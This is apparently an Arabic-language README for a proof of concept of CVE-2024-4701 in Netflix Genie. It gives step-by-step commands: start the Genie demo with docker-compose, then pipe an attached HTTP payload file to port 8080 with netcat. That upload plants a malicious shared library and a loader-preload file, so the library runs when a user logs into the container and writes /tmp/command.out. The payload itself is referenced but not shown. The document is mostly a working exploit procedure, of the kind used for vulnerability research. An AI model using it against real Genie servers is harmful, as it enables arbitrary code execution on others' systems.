
POC لـ CVE-2024-4701
POC لـ CVE-2024-4701
قم بتنزيل ملف docker الخاص بـ genie من https://netflix.github.io/genie/docs/4.3.0/demo/docker-compose.yml أو من هذا المستودع
قم بتشغيل
docker-compose up
قم بتنزيل الحمولة http المرفقة loadlib
قم بتشغيل الأمر التالي
nc -w 5 localhost 8080 < loadlib
قد تحتاج إلى تثبيت netcat ( nc )
سيؤدي ذلك إلى إرسال الحمولة إلى تطبيق genie الذي يعمل داخل docker، والذي يقوم بتحميل ملفات pe.so و ld.so.upload.
ثم قم بتسجيل الدخول إلى حاوية docker الخاصة بـ genie-app
docker exec -it genie_demo_app_4.3.0 /bin/bash
إن عملية تسجيل الدخول تؤدي إلى تشغيل المكتبة الخبيثة، لذا قم بعدها بتشغيل
ls /tmp/
لرؤية الملف command.out المكتوب على القرص.